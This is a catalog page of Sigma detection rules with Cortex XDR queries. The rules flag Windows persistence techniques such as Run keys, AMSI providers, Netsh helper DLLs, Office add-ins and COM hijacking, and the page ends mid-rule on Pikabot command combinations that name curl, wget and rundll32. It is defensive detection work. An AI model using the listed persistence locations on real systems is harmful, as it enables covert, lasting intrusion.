Detects suspicious command line reg.exe tool adding key to RUN key in Registry

status test author Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK sub-technique id de587dce-915e-4218-aac4-835ca6af6f70

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_path contains "\reg.exe" and 
 (action_process_image_command_line contains "reg" and 
 action_process_image_command_line contains " add ") and 
 (action_process_image_command_line in ("*Software\Microsoft\Windows\CurrentVersion\Run*", "*\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run*", "*\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run*"))))

view Sigma YAML

title: Potential Persistence Attempt Via Run Keys Using Reg.EXE
id: de587dce-915e-4218-aac4-835ca6af6f70
status: test
description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry
references:
    - https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/
    - https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2021-06-28
modified: 2025-02-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\reg.exe'
        CommandLine|contains|all:
            - 'reg'
            - ' add '
        CommandLine|contains:
            - 'Software\Microsoft\Windows\CurrentVersion\Run'
            - '\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
            - '\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'
    condition: selection
falsepositives:
    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.
    - Legitimate administrator sets up autorun keys for legitimate reasons.
    - Discord
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml

Convert to SIEM query

medium Moderate Medium FP

Potential Persistence Using DebugPath

Detects potential persistence using Appx DebugPath

status test author frack113 ATT&CK sub-technique id df4dc653-1029-47ba-8231-3c44238cc0ae

cortex_xdr query

config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_registry_key_name contains "Classes\ActivatableClasses\Package\Microsoft." and 
 action_registry_key_name contains "\DebugPath") or 
 (action_registry_key_name contains "\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft." and 
 action_registry_key_name contains "\(Default)")))

view Sigma YAML

title: Potential Persistence Using DebugPath
id: df4dc653-1029-47ba-8231-3c44238cc0ae
status: test
description: Detects potential persistence using Appx DebugPath
references:
    - https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/
    - https://github.com/rootm0s/WinPwnage
author: frack113
date: 2022-07-27
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.015
logsource:
    category: registry_set
    product: windows
detection:
    selection_debug:
        TargetObject|contains: 'Classes\ActivatableClasses\Package\Microsoft.'
        TargetObject|endswith: '\DebugPath'
    selection_default:
        TargetObject|contains: '\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.'
        TargetObject|endswith: '\(Default)'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential Persistence Via AppCompat RegisterAppRestart Layer

Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id b86852fb-4c77-48f9-8519-eb1b2c308b59

cortex_xdr query

config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_registry_key_name contains "\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\" and 
 (action_registry_value_name contains "REGISTERAPPRESTART" or 
 action_registry_data contains "REGISTERAPPRESTART")))

view Sigma YAML

title: Potential Persistence Via AppCompat RegisterAppRestart Layer
id: b86852fb-4c77-48f9-8519-eb1b2c308b59
status: test
description: |
    Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.
    This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
    This can be potentially abused as a persistence mechanism.
references:
    - https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md
author: Nasreddine Bencherchali (Nextron Systems)
date: 2024-01-01
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.011
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\'
        Details|contains: 'REGISTERAPPRESTART'
    condition: selection
falsepositives:
    - Legitimate applications making use of this feature for compatibility reasons
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Persistence Via Custom Protocol Handler

Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id fdbf0b9d-0182-4c43-893b-a1eaab92d085

cortex_xdr query

config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_registry_key_name contains "HKCR\" and 
 (action_registry_value_name contains "URL:" or 
 action_registry_data contains "URL:")) and 
 (not 
 ((action_registry_value_name contains "URL:ms-" or 
 action_registry_data contains "URL:ms-") or 
 (actor_process_image_path in ("C:\Program Files (x86)*", "C:\Program Files\*", "C:\Windows\System32\*", "C:\Windows\SysWOW64\*"))))))

view Sigma YAML

title: Potential Persistence Via Custom Protocol Handler
id: fdbf0b9d-0182-4c43-893b-a1eaab92d085
status: test
description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
references:
    - https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-05-30
modified: 2023-05-12
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|startswith: 'HKCR\'
        Details|startswith: 'URL:'
    filter_main_ms_trusted:
        Details|startswith: 'URL:ms-' # Microsoft Protocols usually start with "ms-"
    filter_main_generic_locations:
        Image|startswith: # Add more folders to avoid FP
            - 'C:\Program Files (x86)'
            - 'C:\Program Files\'
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
    # Uncomment This section to add specific Protocol Handler names that are know
    # filter_specific:
    #     Details: 'URL:'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment.
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Persistence Via Event Viewer Events.asp

Detects potential registry persistence technique using the Event Viewer "Events.asp" technique

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id a1e11042-a74a-46e6-b07c-c4ce8ecc239b

cortex_xdr query

config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_registry_key_name in ("*\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram*", "*\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionURL*")) and 
 (not 
 ((actor_process_image_path contains "C:\WINDOWS\system32\svchost.exe" and 
 action_registry_key_name contains "\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram" and 
 (action_registry_value_name = "%%SystemRoot%%\PCHealth\HelpCtr\Binaries\HelpCtr.exe" or 
 action_registry_data = "%%SystemRoot%%\PCHealth\HelpCtr\Binaries\HelpCtr.exe")) or 
 (actor_process_image_path contains "C:\WINDOWS\system32\svchost.exe" and 
 action_registry_key_name contains "\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgramCommandLineParameters" and 
 (contains or 
 contains)) or 
 (action_registry_value_name = "http://go.microsoft.com/fwlink/events.asp" or 
 action_registry_data = "http://go.microsoft.com/fwlink/events.asp") or 
 (action_registry_value_name = "(Empty)" or 
 action_registry_data = "(Empty)")))))

view Sigma YAML

title: Potential Persistence Via Event Viewer Events.asp
id: a1e11042-a74a-46e6-b07c-c4ce8ecc239b
status: test
description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
references:
    - https://twitter.com/nas_bench/status/1626648985824788480
    - https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks
    - https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/
    - https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-17
modified: 2023-03-05
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        # Covers both "\Policies\" and "\Software\" paths for both "Machine" and "User" level configs
        # Also "MicrosoftRedirectionProgramCommandLineParameters" key
        TargetObject|contains:
            - '\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram'
            - '\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionURL'
    filter_default_redirect_program:
        Image|endswith: 'C:\WINDOWS\system32\svchost.exe' # Set via GPO
        TargetObject|endswith: '\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram'
        Details: '%%SystemRoot%%\PCHealth\HelpCtr\Binaries\HelpCtr.exe'
    filter_default_redirect_program_cli:
        Image|endswith: 'C:\WINDOWS\system32\svchost.exe' # Set via GPO
        TargetObject|endswith: '\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgramCommandLineParameters'
        Details: '-url hcp://services/centers/support?topic=%%s'
    filter_url:
        Details: 'http://go.microsoft.com/fwlink/events.asp'
    filter_cleaner:
        Details: '(Empty)'
    condition: selection and not 1 of filter_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Persistence Via Logon Scripts - Registry

Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors

status test author Tom Ueltschi (@c_APT_ure) ATT&CK sub-technique id 9ace0707-b560-49b8-b6ca-5148b42f39fb

cortex_xdr query

config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 action_registry_key_name contains "UserInitMprLogonScript")

view Sigma YAML

title: Potential Persistence Via Logon Scripts - Registry
id: 9ace0707-b560-49b8-b6ca-5148b42f39fb
status: test
description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md
author: Tom Ueltschi (@c_APT_ure)
date: 2019-01-12
modified: 2025-10-26
tags:
    - attack.privilege-escalation
    - attack.t1037.001
    - attack.persistence
    - attack.lateral-movement
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: 'UserInitMprLogonScript'
    condition: selection
falsepositives:
    - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate
level: medium
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml
simulation:
    - type: atomic-red-team
      name: Logon Scripts
      technique: T1037.001
      atomic_guid: d6042746-07d4-4c92-9ad8-e644c114a231

Convert to SIEM query

medium Strong Medium FP

Potential Persistence Via Netsh Helper DLL - Registry

Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper

status test author Anish Bogati ATT&CK sub-technique id c90362e0-2df3-4e61-94fe-b37615814cb1

cortex_xdr query

config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_registry_key_name contains "\SOFTWARE\Microsoft\NetSh" and 
 (action_registry_value_name contains ".dll" or 
 action_registry_data contains ".dll")) and 
 (not 
 (actor_process_image_path = "C:\Windows\System32\poqexec.exe" and 
 ((action_registry_value_name in ("ipmontr.dll", "iasmontr.dll", "ippromon.dll")) or 
 (action_registry_data in ("ipmontr.dll", "iasmontr.dll", "ippromon.dll")))))))

view Sigma YAML

title: Potential Persistence Via Netsh Helper DLL - Registry
id: c90362e0-2df3-4e61-94fe-b37615814cb1
related:
    - id: 56321594-9087-49d9-bf10-524fe8479452
      type: similar
    - id: e7b18879-676e-4a0e-ae18-27039185a8e7
      type: similar
status: test
description: |
    Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
references:
    - https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll
    - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/
author: Anish Bogati
date: 2023-11-28
modified: 2025-10-08
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.007
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\SOFTWARE\Microsoft\NetSh'
        Details|contains: '.dll'
    filter_main_poqexec:
        Image: 'C:\Windows\System32\poqexec.exe'
        Details:
            - 'ipmontr.dll'
            - 'iasmontr.dll'
            - 'ippromon.dll'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Legitimate helper added by different programs and the OS
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Persistence Via New AMSI Providers - Registry

Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections. Attackers may add custom AMSI providers to persist on the system and evade detection by security software that relies on AMSI for scanning scripts and other content. This technique is often used in conjunction with fileless malware and script-based attacks to maintain persistence while avoiding detection.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 33efc23c-6ea2-4503-8cfe-bdf82ce8f705

cortex_xdr query

config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_registry_key_name in ("*\SOFTWARE\Microsoft\AMSI\Providers\*", "*\SOFTWARE\WOW6432Node\Microsoft\AMSI\Providers\*")) and 
 (not 
 (((actor_process_image_path in ("C:\Program Files\Avast Software\Avast\RegSvr.exe", "C:\Program Files\Avast Software\Avast\x86\RegSvr.exe")) and 
 action_registry_key_name contains "\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}") or 
 ((actor_process_image_path in ("C:\Program Files\AVG\Antivirus\RegSvr.exe", "C:\Program Files\AVG\Antivirus\x86\RegSvr.exe")) and 
 action_registry_key_name contains "\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}") or 
 (actor_process_image_path = "C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe" and 
 action_registry_key_name contains "\{00000001-3DCC-4B48-A82E-E2071FE58E05}")))))

view Sigma YAML

title: Potential Persistence Via New AMSI Providers - Registry
id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705
status: test
description: |
    Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections.
    Attackers may add custom AMSI providers to persist on the system and evade detection by security software that relies on AMSI for scanning scripts and other content.
    This technique is often used in conjunction with fileless malware and script-based attacks to maintain persistence while avoiding detection.
references:
    - https://persistence-info.github.io/Data/amsi.html
    - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-21
modified: 2025-10-26
tags:
    - attack.persistence
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains:
            - '\SOFTWARE\Microsoft\AMSI\Providers\'
            - '\SOFTWARE\WOW6432Node\Microsoft\AMSI\Providers\'
    filter_optional_avast:
        Image:
            - 'C:\Program Files\Avast Software\Avast\RegSvr.exe'
            - 'C:\Program Files\Avast Software\Avast\x86\RegSvr.exe'
        TargetObject|contains: '\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}'
    filter_optional_avg:
        Image:
            - 'C:\Program Files\AVG\Antivirus\RegSvr.exe'
            - 'C:\Program Files\AVG\Antivirus\x86\RegSvr.exe'
        TargetObject|contains: '\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}'
    filter_optional_avira:
        Image: 'C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe'
        TargetObject|contains: '\{00000001-3DCC-4B48-A82E-E2071FE58E05}'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Legitimate security products adding their own AMSI providers. Filter these according to your environment.
level: medium
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml

Convert to SIEM query

medium Strong Medium FP

Potential Persistence Via Notepad++ Plugins

Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 54127bd4-f541-4ac3-afdb-ea073f63f692

cortex_xdr query

config case_sensitive = false | preset=xdr_file | filter event_type = ENUM.FILE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_file_name contains "\Notepad++\plugins\" and 
 action_file_name contains ".dll") and 
 (not 
 (actor_process_image_path contains "\Notepad++\updater\gup.exe" or 
 (actor_process_image_path contains "C:\Users\" and 
 actor_process_image_path contains "\AppData\Local\Temp\" and 
 (actor_process_image_path in ("*\target.exe", "*Installer.x64.exe"))) or 
 (actor_process_image_path contains "\npp." and 
 actor_process_image_path contains ".exe" and 
 (action_file_name in ("C:\Program Files\Notepad++\plugins\NppExport\NppExport.dll", "C:\Program Files\Notepad++\plugins\mimeTools\mimeTools.dll", "C:\Program Files\Notepad++\plugins\NppConverter\NppConverter.dll", "C:\Program Files\Notepad++\plugins\Config\nppPluginList.dll")))))))

view Sigma YAML

title: Potential Persistence Via Notepad++ Plugins
id: 54127bd4-f541-4ac3-afdb-ea073f63f692
status: test
description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
references:
    - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-10
modified: 2025-09-01
tags:
    - attack.persistence
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|contains: '\Notepad++\plugins\'
        TargetFilename|endswith: '.dll'
    filter_gup:
        Image|endswith: '\Notepad++\updater\gup.exe'
    filter_install:
        # This filter is for Sigma dataset you could remove it or change when using the rule in your own env
        Image|startswith: 'C:\Users\'
        Image|contains: '\AppData\Local\Temp\'
        Image|endswith:
            - '\target.exe'
            - 'Installer.x64.exe'
    filter_main_installer:
        Image|contains: '\npp.'
        Image|endswith: '.exe'
        TargetFilename:
            - 'C:\Program Files\Notepad++\plugins\NppExport\NppExport.dll'
            - 'C:\Program Files\Notepad++\plugins\mimeTools\mimeTools.dll'
            - 'C:\Program Files\Notepad++\plugins\NppConverter\NppConverter.dll'
            - 'C:\Program Files\Notepad++\plugins\Config\nppPluginList.dll'
    condition: selection and not 1 of filter_*
falsepositives:
    - Possible FPs during first installation of Notepad++
    - Legitimate use of custom plugins by users in order to enhance notepad++ functionalities
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential Persistence Via Scrobj.dll COM Hijacking

Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute

status test author frack113 ATT&CK sub-technique id fe20dda1-6f37-4379-bbe0-a98d400cae90

cortex_xdr query

config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_registry_key_name contains "InprocServer32\(Default)" and 
 (action_registry_value_name = "C:\WINDOWS\system32\scrobj.dll" or 
 action_registry_data = "C:\WINDOWS\system32\scrobj.dll")))

view Sigma YAML

title: Potential Persistence Via Scrobj.dll COM Hijacking
id: fe20dda1-6f37-4379-bbe0-a98d400cae90
status: test
description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md
author: frack113
date: 2022-08-20
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.015
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: 'InprocServer32\(Default)'
        Details: 'C:\WINDOWS\system32\scrobj.dll'
    condition: selection
falsepositives:
    - Legitimate use of the dll.
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Persistence Via Visual Studio Tools for Office

Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.

status test author Bhabesh Raj ATT&CK sub-technique id 9d15044a-7cfe-4d23-8085-6ebc11df7685

cortex_xdr query

config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_registry_key_name in ("*\Software\Microsoft\Office\Outlook\Addins\*", "*\Software\Microsoft\Office\Word\Addins\*", "*\Software\Microsoft\Office\Excel\Addins\*", "*\Software\Microsoft\Office\Powerpoint\Addins\*", "*\Software\Microsoft\VSTO\Security\Inclusion\*")) and 
 (not 
 ((actor_process_image_path in ("C:\Windows\System32\msiexec.exe", "C:\Windows\SysWOW64\msiexec.exe", "C:\Windows\System32\regsvr32.exe", "C:\Windows\SysWOW64\regsvr32.exe")) or 
 ((actor_process_image_path in ("C:\Program Files\Common Files (x86)\Microsoft Shared\ClickToRun\*", "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\*")) and 
 actor_process_image_path contains "\OfficeClickToRun.exe") or 
 (actor_process_image_path in ("C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe", "C:\Program Files\Microsoft Office\root\integration\integrator.exe")) or 
 ((actor_process_image_path in ("C:\Program Files\Microsoft Office\OFFICE*", "C:\Program Files (x86)\Microsoft Office\OFFICE*", "C:\Program Files\Microsoft Office\Root\OFFICE*", "C:\Program Files (x86)\Microsoft Office\Root\OFFICE*", "C:\PROGRA~2\MICROS~2\Office*")) and 
 (actor_process_image_path in ("*\excel.exe", "*\Integrator.exe", "*\OneNote.exe", "*\outlook.exe", "*\powerpnt.exe", "*\Teams.exe", "*\visio.exe", "*\winword.exe"))) or 
 ((actor_process_image_path in ("C:\Program Files\Common Files\Microsoft Shared\VSTO\*", "C:\Program Files (x86)\Microsoft Shared\VSTO\*")) and 
 actor_process_image_path contains "\VSTOInstaller.exe"))) and 
 (not 
 (((actor_process_image_path in ("C:\Program Files\AVG\Antivirus\RegSvr.exe", "C:\Program Files (x86)\AVG\Antivirus\RegSvr.exe")) and 
 action_registry_key_name contains "\Microsoft\Office\Outlook\Addins\Antivirus.AsOutExt\") or 
 ((actor_process_image_path in ("C:\Program Files\Avast Software\Avast\RegSvr.exe", "C:\Program Files (x86)\Avast Software\Avast\RegSvr.exe")) and 
 action_registry_key_name contains "\Microsoft\Office\Outlook\Addins\Avast.AsOutExt\")))))

view Sigma YAML

title: Potential Persistence Via Visual Studio Tools for Office
id: 9d15044a-7cfe-4d23-8085-6ebc11df7685
status: test
description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
references:
    - https://twitter.com/_vivami/status/1347925307643355138
    - https://vanmieghem.io/stealth-outlook-persistence/
author: Bhabesh Raj
date: 2021-01-10
modified: 2026-01-09
tags:
    - attack.t1137.006
    - attack.persistence
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains:
            - '\Software\Microsoft\Office\Outlook\Addins\'
            - '\Software\Microsoft\Office\Word\Addins\'
            - '\Software\Microsoft\Office\Excel\Addins\'
            - '\Software\Microsoft\Office\Powerpoint\Addins\'
            - '\Software\Microsoft\VSTO\Security\Inclusion\'
    filter_main_system:
        Image:
            - 'C:\Windows\System32\msiexec.exe'
            - 'C:\Windows\SysWOW64\msiexec.exe'
            - 'C:\Windows\System32\regsvr32.exe'
            - 'C:\Windows\SysWOW64\regsvr32.exe' # e.g. default Evernote installation
    filter_main_office_click_to_run:
        Image|startswith:
            - 'C:\Program Files\Common Files (x86)\Microsoft Shared\ClickToRun\'
            - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\'
        Image|endswith: '\OfficeClickToRun.exe'
    filter_main_integrator:
        Image:
            - 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe'
            - 'C:\Program Files\Microsoft Office\root\integration\integrator.exe'
    filter_main_office_apps:
        Image|startswith:
            - 'C:\Program Files\Microsoft Office\OFFICE'
            - 'C:\Program Files (x86)\Microsoft Office\OFFICE'
            - 'C:\Program Files\Microsoft Office\Root\OFFICE'
            - 'C:\Program Files (x86)\Microsoft Office\Root\OFFICE'
            - 'C:\PROGRA~2\MICROS~2\Office'
        Image|endswith:
            - '\excel.exe'
            - '\Integrator.exe'
            - '\OneNote.exe'
            - '\outlook.exe'
            - '\powerpnt.exe'
            - '\Teams.exe'
            - '\visio.exe'
            - '\winword.exe'
    filter_main_vsto:
        Image|startswith:
            - 'C:\Program Files\Common Files\Microsoft Shared\VSTO\'
            - 'C:\Program Files (x86)\Microsoft Shared\VSTO\'
        Image|endswith: '\VSTOInstaller.exe'
    filter_optional_avg:
        Image:
            - 'C:\Program Files\AVG\Antivirus\RegSvr.exe'
            - 'C:\Program Files (x86)\AVG\Antivirus\RegSvr.exe'
        TargetObject|contains: '\Microsoft\Office\Outlook\Addins\Antivirus.AsOutExt\'
    filter_optional_avast:
        Image:
            - 'C:\Program Files\Avast Software\Avast\RegSvr.exe'
            - 'C:\Program Files (x86)\Avast Software\Avast\RegSvr.exe'
        TargetObject|contains: '\Microsoft\Office\Outlook\Addins\Avast.AsOutExt\'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Legitimate Addin Installation
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE

Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.

status test author Alejandro Houspanossian ('@lekz86') ATT&CK sub-technique id e5144106-8198-4f6e-bfc2-0a551cc8dd94

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_process_image_command_line contains "cmd" and 
 action_process_image_command_line contains "/c") and 
 (action_process_image_command_line in ("* & *", "* || *")) and 
 (action_process_image_command_line in ("* curl*", "* wget*", "* timeout *", "* ping *")) and 
 (action_process_image_command_line in ("* rundll32*", "* mkdir *"))))

view Sigma YAML

title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
id: e5144106-8198-4f6e-bfc2-0a551cc8dd94
status: test
description: |
    Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
    Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files.
    In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
references:
    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt
    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt
author: Alejandro Houspanossian ('@lekz86')
date: 2024-01-02
tags:
    - attack.command-and-control
    - attack.execution
    - attack.stealth
    - attack.t1059.003
    - attack.t1105
    - attack.t1218
    - detection.emerging-threats
logsource:
    product: windows
    category: process_creation
detection:
    selection_cmd:
        CommandLine|contains|all:
            - 'cmd'
            - '/c'
    selection_pipes:
        CommandLine|contains:
            - ' & '
            - ' || '
    selection_commands_1:
        CommandLine|contains:
            - ' curl'
            - ' wget'
            - ' timeout '
            - ' ping '
    selection_commands_2:
        CommandLine|contains:
